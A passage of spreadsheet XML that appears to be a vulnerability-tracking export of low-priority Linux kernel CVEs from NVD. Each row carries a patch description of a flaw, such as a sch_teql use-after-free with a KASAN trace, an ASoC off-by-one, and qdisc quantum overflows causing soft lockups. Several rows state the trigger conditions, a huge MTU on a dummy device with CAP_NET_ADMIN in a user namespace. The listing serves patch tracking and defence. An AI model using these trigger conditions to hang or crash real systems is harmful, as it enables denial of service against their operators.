hashinfo before the clcsock is created, and smc_diag dumps walk that
hash dereferencing smc-&gt;clcsock without taking clcsock_release_lock,
while sk_common_release() calls .destroy before .unhash. Unhash the
sock before releasing the clcsock, as __smc_release() does, so a
concurrent dump cannot observe the release; the second unhash in
sk_common_release() is a no-op.</t>
        </is>
      </c>
      <c r="T433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90065</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B434" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90066</t>
        </is>
      </c>
      <c r="D434" s="5" t="inlineStr"/>
      <c r="E434" s="5" t="inlineStr"/>
      <c r="F434" s="5" t="inlineStr"/>
      <c r="G434" s="5" t="inlineStr"/>
      <c r="H434" s="5" t="inlineStr"/>
      <c r="I434" s="5" t="inlineStr"/>
      <c r="J434" s="5" t="inlineStr"/>
      <c r="K434" s="5" t="inlineStr"/>
      <c r="L434" s="5" t="inlineStr"/>
      <c r="M434" s="5" t="inlineStr"/>
      <c r="N434" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O434" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P434" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q434" s="5" t="inlineStr"/>
      <c r="R434" s="5" t="inlineStr"/>
      <c r="S434" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
samples/ftrace: Fix kthread_stop() on ERR_PTR in ftrace-direct-multi-modify
ftrace_direct_multi_init() assigns kthread_run()'s return value to
simple_tsk without an IS_ERR() check. When kthread_run() fails it
returns ERR_PTR(-ENOMEM), but init still returns 0, so the module loads
with simple_tsk holding an error pointer. On unload,
ftrace_direct_multi_exit() then passes that ERR_PTR to kthread_stop(),
leading to a null-pointer-dereference.
Check the return value of kthread_run() with IS_ERR(); on failure,
unregister the ftrace direct call and propagate the error code.</t>
        </is>
      </c>
      <c r="T434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90066</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B435" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90067</t>
        </is>
      </c>
      <c r="D435" s="5" t="inlineStr"/>
      <c r="E435" s="5" t="inlineStr"/>
      <c r="F435" s="5" t="inlineStr"/>
      <c r="G435" s="5" t="inlineStr"/>
      <c r="H435" s="5" t="inlineStr"/>
      <c r="I435" s="5" t="inlineStr"/>
      <c r="J435" s="5" t="inlineStr"/>
      <c r="K435" s="5" t="inlineStr"/>
      <c r="L435" s="5" t="inlineStr"/>
      <c r="M435" s="5" t="inlineStr"/>
      <c r="N435" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O435" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P435" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q435" s="5" t="inlineStr"/>
      <c r="R435" s="5" t="inlineStr"/>
      <c r="S435" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
libceph: validate banner payload length
When parsing the Ceph messenger v2 protocol banner, the `payload_len` field
is decoded from the banner prefix. If a client sends a banner with a
`payload_len` of 0, the kernel sets up a 0-length socket read. This
violates an invariant in the state machine, triggering a warning in
`populate_in_iter()`:
------------[ cut here ]------------
!iov_iter_count(&amp;con-&gt;v2.in_iter)
WARNING: net/ceph/messenger_v2.c:3129 at populate_in_iter
net/ceph/messenger_v2.c:3129 [inline], CPU#1: kworker/1:3/5070
WARNING: net/ceph/messenger_v2.c:3129 at ceph_con_v2_try_read+0x6634/0x6810
net/ceph/messenger_v2.c:3159, CPU#1: kworker/1:3/5070
...
Call Trace:
 &lt;TASK&gt;
 ceph_con_workfn+0x1f5/0x14a0 net/ceph/messenger.c:1575
 process_one_work kernel/workqueue.c:3322 [inline]
 process_scheduled_works+0xa8e/0x14e0 kernel/workqueue.c:3405
 worker_thread+0xa47/0xfb0 kernel/workqueue.c:3486
 kthread+0x388/0x470 kernel/kthread.c:436
 ret_from_fork+0x514/0xb70 arch/x86/kernel/process.c:158
 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245
 &lt;/TASK&gt;
According to the msgr2 protocol specification, the banner payload is
expected to contain at least two 64-bit integers (`server_feat` and
`server_req_feat`). Therefore, `payload_len` must be at least 16 bytes.
Fix this by adding a check in `process_banner_prefix()` to reject a
`payload_len` smaller than 16 bytes. This prevents the 0-length read and
correctly aborts the connection with a protocol error.</t>
        </is>
      </c>
      <c r="T435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90067</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B436" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90068</t>
        </is>
      </c>
      <c r="D436" s="5" t="inlineStr"/>
      <c r="E436" s="5" t="inlineStr"/>
      <c r="F436" s="5" t="inlineStr"/>
      <c r="G436" s="5" t="inlineStr"/>
      <c r="H436" s="5" t="inlineStr"/>
      <c r="I436" s="5" t="inlineStr"/>
      <c r="J436" s="5" t="inlineStr"/>
      <c r="K436" s="5" t="inlineStr"/>
      <c r="L436" s="5" t="inlineStr"/>
      <c r="M436" s="5" t="inlineStr"/>
      <c r="N436" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O436" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P436" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q436" s="5" t="inlineStr"/>
      <c r="R436" s="5" t="inlineStr"/>
      <c r="S436" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: dapm: Fix off-by-one check on the second enum channel
The snd_soc_dapm_put_enum_double() rejects item[0] once it reaches
e-&gt;items, but it lets item[1] be equal to it.  Both go on to
snd_soc_enum_item_to_val(), which indexes e-&gt;values with no bound of
its own, so an enum with a value table reads one element past the end.
The indexing arrived with the MUX consolidation, which relaxed the
item[1] check in the same hunk.  The value MUX handler it deleted used
&gt;= there, and the snd_soc_put_enum_double() in soc-ops.c still does.
Only adav80x pairs a value table with two shifts, and its second
channel looks accidental, but the control does report two values.
Writing three into it reads off the end of adav80x_mux_values.  The
core catches that only under CONFIG_SND_CTL_INPUT_VALIDATION, which
defaults off.</t>
        </is>
      </c>
      <c r="T436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90068</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B437" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90069</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2026-09-17</t>
        </is>
      </c>
      <c r="P437" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q437" s="5" t="inlineStr"/>
      <c r="R437" s="5" t="inlineStr"/>
      <c r="S437" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: acomp - allocate async request context when cloning
ACOMP_REQUEST_ON_STACK() reserves only enough storage for the
synchronous fallback. When an async implementation is selected, callers
clone that stack request before retrying, but acomp_request_clone()
currently copies only the stack-sized object. The clone therefore has no
storage for the async provider request context, and providers such as QAT
write past the allocation through acomp_request_ctx(). KASAN does report
a slab OOB write.
Allocate a zeroed clone large enough for the runtime acomp request size,
copy only the bytes present in the source object, and preserve the
existing fallback-on-allocation-failure behavior. Use the runtime reqsize
because an implementation may adjust it during tfm initialization.</t>
        </is>
      </c>
      <c r="T437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90069</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B438" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90070</t>
        </is>
      </c>
      <c r="D438" s="5" t="inlineStr"/>
      <c r="E438" s="5" t="inlineStr"/>
      <c r="F438" s="5" t="inlineStr"/>
      <c r="G438" s="5" t="inlineStr"/>
      <c r="H438" s="5" t="inlineStr"/>
      <c r="I438" s="5" t="inlineStr"/>
      <c r="J438" s="5" t="inlineStr"/>
      <c r="K438" s="5" t="inlineStr"/>
      <c r="L438" s="5" t="inlineStr"/>
      <c r="M438" s="5" t="inlineStr"/>
      <c r="N438" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O438" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P438" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q438" s="5" t="inlineStr"/>
      <c r="R438" s="5" t="inlineStr"/>
      <c r="S438" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tpm: st33zp24: Return zero on status read failure
st33zp24_status() ignores the result of the transport read and returns
data even when no byte was received. The I2C transport, for example,
skips i2c_master_recv() when the register-select write is short or fails,
leaving data uninitialized. The resulting stack value can be interpreted
as TPM_STS flags and let status checks complete spuriously.
The status callback cannot propagate a transport error. Return zero
unless recv() reports exactly one byte. With no status bits set, callers
retry or take their existing timeout or error path instead of acting on
an invalid status value.
This issue was found by a static analysis checker and confirmed by manual
source review.</t>
        </is>
      </c>
      <c r="T438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90070</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B439" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90071</t>
        </is>
      </c>
      <c r="D439" s="5" t="inlineStr"/>
      <c r="E439" s="5" t="inlineStr"/>
      <c r="F439" s="5" t="inlineStr"/>
      <c r="G439" s="5" t="inlineStr"/>
      <c r="H439" s="5" t="inlineStr"/>
      <c r="I439" s="5" t="inlineStr"/>
      <c r="J439" s="5" t="inlineStr"/>
      <c r="K439" s="5" t="inlineStr"/>
      <c r="L439" s="5" t="inlineStr"/>
      <c r="M439" s="5" t="inlineStr"/>
      <c r="N439" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O439" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P439" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q439" s="5" t="inlineStr"/>
      <c r="R439" s="5" t="inlineStr"/>
      <c r="S439" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: sch_teql: restore skb-&gt;dev on the slave failure path
teql_master_xmit() sets skb-&gt;dev = slave before calling the slave's
ndo_start_xmit(), but never restores it when that transmit fails. The
skb then walks on to the next slave still pointing at the previous one.
If a later slave has no resolved neighbour, teql_resolve() hands the skb
to neigh_event_send(), which queues it on that neighbour's arp_queue
with the stale skb-&gt;dev. skb-&gt;dev holds no reference, so deleting the
previous slave frees the net_device while the skb is still queued.
Whatever runs next on that skb - arp_error_report() on timeout, or
neigh_direct_output() -&gt; dev_queue_xmit() once the neighbour resolves -
causes a UAF like the one below:
BUG: KASAN: slab-use-after-free in __icmp_send (net/ipv4/icmp.c:914 (discriminator 2))
Read of size 4 at addr ffff888106e100b0 by task flood_packet/527
CPU: 0 UID: 0 PID: 527 Comm: flood_packet Not tainted 7.2.0-rc6-g594d90519502 #1 PREEMPT(lazy)
Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
Call Trace:
&lt;IRQ&gt;
dump_stack_lvl (lib/dump_stack.c:94 lib/dump_stack.c:120)
print_report (mm/kasan/report.c:378 mm/kasan/report.c:482)
? __pfx__raw_spin_lock_irqsave (./include/asm-generic/qrwlock.h:122 (discriminator 4))
? __icmp_send (net/ipv4/icmp.c:914 (discriminator 2))
kasan_report (mm/kasan/report.c:595)
? __icmp_send (net/ipv4/icmp.c:914 (discriminator 2))
__icmp_send (net/ipv4/icmp.c:914 (discriminator 2))
[...]
ipv4_link_failure (net/ipv4/route.c:1251 net/ipv4/route.c:1258)
? __pfx_ipv4_link_failure (./include/linux/skbuff.h:4327)
? _raw_write_lock (./include/linux/instrumented.h:55 ./include/linux/atomic/atomic-instrumented.h:1301 ./include/asm-generic/qrwlock.h:98 ./include/linux/rwlock_api_smp.h:230 kernel/locking/spinlock.c:304)
? __pfx__raw_write_lock (kernel/locking/spinlock.c:175)
arp_error_report (./include/net/dst.h:438 net/ipv4/arp.c:296)
neigh_invalidate (net/core/neighbour.c:1077)
neigh_timer_handler (net/core/neighbour.c:1169)
[...]
Allocated by task 505:
kasan_save_stack (mm/kasan/common.c:57)
kasan_save_track (mm/kasan/common.c:78)
__kasan_kmalloc (mm/kasan/common.c:398 mm/kasan/common.c:415)
__kvmalloc_node_noprof (./include/linux/kasan.h:263 mm/slub.c:5334 mm/slub.c:6905)
alloc_netdev_mqs (net/core/dev.c:12055 (discriminator 2))
rtnl_create_link (net/core/rtnetlink.c:3721)
rtnl_newlink (net/core/rtnetlink.c:3903 net/core/rtnetlink.c:4044 net/core/rtnetlink.c:4159)
rtnetlink_rcv_msg (net/core/rtnetlink.c:7076)
[...]
Freed by task 536:
kasan_save_stack (mm/kasan/common.c:57)
kasan_save_track (mm/kasan/common.c:78)
kasan_save_free_info (mm/kasan/generic.c:584)
__kasan_slab_free (mm/kasan/common.c:253 mm/kasan/common.c:285)
kfree (./include/linux/kasan.h:235 mm/slub.c:2677 mm/slub.c:6377 mm/slub.c:6692)
device_release (drivers/base/core.c:2636)
kobject_put (lib/kobject.c:689 lib/kobject.c:720 ./include/linux/kref.h:65 lib/kobject.c:737)
netdev_run_todo (net/core/dev.c:11756)
rtnl_dellink (net/core/rtnetlink.c:157 ./include/linux/rtnetlink.h:135 net/core/rtnetlink.c:3651)
rtnetlink_rcv_msg (net/core/rtnetlink.c:7076)
[...]
Fix this by restoring skb-&gt;dev to the master at the end of each slave's
iteration.</t>
        </is>
      </c>
      <c r="T439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90071</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B440" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90072</t>
        </is>
      </c>
      <c r="D440" s="5" t="inlineStr"/>
      <c r="E440" s="5" t="inlineStr"/>
      <c r="F440" s="5" t="inlineStr"/>
      <c r="G440" s="5" t="inlineStr"/>
      <c r="H440" s="5" t="inlineStr"/>
      <c r="I440" s="5" t="inlineStr"/>
      <c r="J440" s="5" t="inlineStr"/>
      <c r="K440" s="5" t="inlineStr"/>
      <c r="L440" s="5" t="inlineStr"/>
      <c r="M440" s="5" t="inlineStr"/>
      <c r="N440" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O440" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P440" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q440" s="5" t="inlineStr"/>
      <c r="R440" s="5" t="inlineStr"/>
      <c r="S440" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: sfq: clamp quantum to avoid signed overflow soft lockup
sfq_init() sets q-&gt;quantum = psched_mtu(qdisc_dev(sch)) (unsigned). A
device with a huge MTU (e.g. dummy with max_mtu == 0 accepting MTU
2147483634) makes psched_mtu() return 0x80000000, so slot-&gt;allot = INT_MIN
and INT_MIN + INT_MIN toggles between INT_MIN and 0 forever, spinning
sfq_dequeue() under the qdisc lock.
Clamp the quantum to [256, 1 &lt;&lt; 20] so the refill loop terminates. The
lower bound also covers q-&gt;quantum == 0 (psched_mtu() returning 0),
which spins sfq_dequeue() identically. sfq_change() already rejects a
negative quantum, so only the init path was exposed.
Conditions to recreate the bug: a device whose MTU (plus
hard_header_len) wraps psched_mtu() into the sign bit (e.g. a dummy
device with max_mtu == 0 accepting MTU 2147483634). Requires
CAP_NET_ADMIN in a user namespace.</t>
        </is>
      </c>
      <c r="T440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90072</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B441" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90073</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2026-09-17</t>
        </is>
      </c>
      <c r="P441" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q441" s="5" t="inlineStr"/>
      <c r="R441" s="5" t="inlineStr"/>
      <c r="S441" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: hhf: clamp quantum before hhf_change() to avoid overflow
hhf_init() sets q-&gt;quantum = psched_mtu(qdisc_dev(sch)) with no overflow
check. A device with a huge MTU (e.g. dummy with max_mtu == 0 accepting
MTU 2147483634) makes weight * quantum overflow the signed deficit in
hhf_dequeue(), spinning forever.
Clamp q-&gt;quantum before hhf_change() so both the opt and !opt paths see
a sane quantum. Without this, bare "tc qdisc add ... hhf" succeeds with
a clamped quantum but "tc qdisc add ... hhf limit 1000" (any option
present) fails with -EINVAL because hhf_change() re-validates the
unclamped default (sch_hhf.c:559). 256 matches fq_codel's floor and is
a sane minimum for a DRR quantum.
Conditions to recreate the bug: a device whose MTU (plus
hard_header_len) wraps psched_mtu() into the sign bit (e.g. a dummy
device with max_mtu == 0 accepting MTU 2147483634). Requires
CAP_NET_ADMIN in a user namespace.</t>
        </is>
      </c>
      <c r="T441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90073</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B442" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90074</t>
        </is>
      </c>
      <c r="D442" s="5" t="inlineStr"/>
      <c r="E442" s="5" t="inlineStr"/>
      <c r="F442" s="5" t="inlineStr"/>
      <c r="G442" s="5" t="inlineStr"/>
      <c r="H442" s="5" t="inlineStr"/>
      <c r="I442" s="5" t="inlineStr"/>
      <c r="J442" s="5" t="inlineStr"/>
      <c r="K442" s="5" t="inlineStr"/>
      <c r="L442" s="5" t="inlineStr"/>
      <c r="M442" s="5" t="inlineStr"/>
      <c r="N442" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O442" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P442" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q442" s="5" t="inlineStr"/>
      <c r="R442" s="5" t="inlineStr"/>
      <c r="S442" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: fq_pie: clamp default quantum to avoid signed overflow
fq_pie_init() sets q-&gt;quantum = psched_mtu(qdisc_dev(sch)) without
clamping. A device with a huge MTU (e.g. dummy with max_mtu == 0
accepting MTU 2147483634) makes psched_mtu() return 0x80000000, which
overflows the signed flow-&gt;deficit to INT_MIN in fq_pie_qdisc_dequeue(),
causing an infinite loop and soft lockup. Emulate fq_pie_policy which
is already bounded to [1, 1 &lt;&lt; 20]; clamp the default to [256, 1 &lt;&lt; 20].
256 matches fq_codel's floor and is a sane minimum for a DRR quantum.
Conditions to recreate the bug: a device whose MTU (plus
hard_header_len) wraps psched_mtu() into the sign bit (e.g. a dummy
device with max_mtu == 0 accepting MTU 2147483634). Requires
CAP_NET_ADMIN in a user namespace.</t>
        </is>
      </c>
      <c r="T442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90074</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B443" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90075</t>
        </is>
      </c>
      <c r="D443" s="5" t="inlineStr"/>
      <c r="E443" s="5" t="inlineStr"/>
      <c r="F443" s="5" t="inlineStr"/>
      <c r="G443" s="5" t="inlineStr"/>
      <c r="H443" s="5" t="inlineStr"/>
      <c r="I443" s="5" t="inlineStr"/>
      <c r="J443" s="5" t="inlineStr"/>
      <c r="K443" s="5" t="inlineStr"/>
      <c r="L443" s="5" t="inlineStr"/>
      <c r="M443" s="5" t="inlineStr"/>
      <c r="N443" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O443" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P443" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q443" s="5" t="inlineStr"/>
      <c r="R443" s="5" t="inlineStr"/>
      <c r="S443" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: fq_codel: clamp default quantum and mtu
fq_codel_init() sets q-&gt;quantum = psched_mtu(qdisc_dev(sch)) without
clamping. A device with a huge MTU (e.g. dummy with max_mtu == 0
accepting MTU 2147483634) makes psched_mtu() return 0x80000000, which
overflows the signed flow-&gt;deficit to INT_MIN in fq_codel_dequeue(),
causing an infinite loop and soft lockup. Emulate fq_codel_change()
and constrain to [256, FQ_CODEL_QUANTUM_MAX].
The same unclamped psched_mtu() is assigned to q-&gt;cparams.mtu a bit
below, and fq_codel_change() never updates it. codel_should_drop()
tests "*backlog &lt;= params-&gt;mtu"; with mtu == 0x80000000 (~2 GiB) and
the default 32 MiB memory_limit, the test is always true, so CoDel is
silently and completely disabled (no drops, no ECN). Declare a single
clamped mtu and assign both q-&gt;quantum and q-&gt;cparams.mtu from it,
which also removes the double psched_mtu() call.
Conditions to recreate the bug: a device whose MTU (plus
hard_header_len) wraps psched_mtu() into the sign bit (e.g. a dummy
device with max_mtu == 0 accepting MTU 2147483634). Requires
CAP_NET_ADMIN in a user namespace.</t>
        </is>
      </c>
      <c r="T443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90075</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B444" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90076</t>
        </is>
      </c>
      <c r="D444" s="5" t="inlineStr"/>
      <c r="E444" s="5" t="inlineStr"/>
      <c r="F444" s="5" t="inlineStr"/>
      <c r="G444" s="5" t="inlineStr"/>
      <c r="H444" s="5" t="inlineStr"/>
      <c r="I444" s="5" t="inlineStr"/>
      <c r="J444" s="5" t="inlineStr"/>
      <c r="K444" s="5" t="inlineStr"/>
      <c r="L444" s="5" t="inlineStr"/>
      <c r="M444" s="5" t="inlineStr"/>
      <c r="N444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O444" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P444" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q444" s="5" t="inlineStr"/>
      <c r="R444" s="5" t="inlineStr"/>
      <c r="S444" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: fq: add overflow bounds to quantum and initial quantum
fq_init() computes quantum = 2 * psched_mtu() and initial_quantum = 10 *
psched_mtu() with no overflow check. A device with a huge MTU (e.g. dummy
with max_mtu == 0 accepting MTU 2147483634) makes psched_mtu() return
0x80000000; the 2 * and 10 * multiplications wrap to 0 in 32-bit
arithmetic, so q-&gt;quantum == 0. Then in fq_dequeue() the credit-refill
loop adds 0 to f-&gt;credit (which stays &lt;= 0) and goto begin loops
forever under the qdisc lock, creating a soft lockup.
Clamp psched_mtu() to [1, 1 &lt;&lt; 20] before multiplying so the product
cannot wrap, then cap the result at 1 &lt;&lt; 20, matching the bound already
enforced on TCA_FQ_QUANTUM in fq_change().
Conditions to recreate the bug: a device whose MTU (plus
hard_header_len) is large enough that 2 * psched_mtu() wraps (e.g. a
dummy device with max_mtu == 0 accepting MTU 2147483634). Requires
CAP_NET_ADMIN in a user namespace.</t>
        </is>
      </c>
      <c r="T444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90076</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B445" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90077</t>
        </is>
      </c>
      <c r="D445" s="5" t="inlineStr"/>
      <c r="E445" s="5" t="inlineStr"/>
      <c r="F445" s="5" t="inlineStr"/>
      <c r="G445" s="5" t="inlineStr"/>
      <c r="H445" s="5" t="inlineStr"/>
      <c r="I445" s="5" t="inlineStr"/>
      <c r="J445" s="5" t="inlineStr"/>
      <c r="K445" s="5" t="inlineStr"/>
      <c r="L445" s="5" t="inlineStr"/>
      <c r="M445" s="5" t="inlineStr"/>
      <c r="N445" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O445" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P445" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q445" s="5" t="inlineStr"/>
      <c r="R445" s="5" t="inlineStr"/>
      <c r="S445" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: fix a resource leak in copy_net_ns() error handling path
Currently, preinit_net() does two things:
  (1) call ns_common_init() which might fail
  (2) initialize resources which does not fail
However, preinit_net() is returning early when (1) fails, and copy_net_ns()
is jumping to the dec_ucounts: label. As a result, resources allocated by
net_alloc() are leaking. We need to call key_remove_domain() and
net_passive_dec() in order to release resources allocated by net_alloc().
We cannot simply jump to the put_userns: label when preinit_net() failed,
for (2) is not yet done. But we can reorder (1) and (2), for there is no
dependency between (1) and (2). Therefore, this patch decouples (1) from
preinit_net() and changes preinit_net() back to a void function, and calls
ns_common_init() after preinit_net() succeeded. Then, we can jump to
immediately after ns_common_free() of the put_userns: label.</t>
        </is>
      </c>
      <c r="T445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90077</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B446" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90078</t>
        </is>
      </c>
      <c r="D446" s="5" t="inlineStr"/>
      <c r="E446" s="5" t="inlineStr"/>
      <c r="F446" s="5" t="inlineStr"/>
      <c r="G446" s="5" t="inlineStr"/>
      <c r="H446" s="5" t="inlineStr"/>
      <c r="I446" s="5" t="inlineStr"/>
      <c r="J446" s="5" t="inlineStr"/>
      <c r="K446" s="5" t="inlineStr"/>
      <c r="L446" s="5" t="inlineStr"/>
      <c r="M446" s="5" t="inlineStr"/>
      <c r="N446" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O446" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P446" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q446" s="5" t="inlineStr"/>
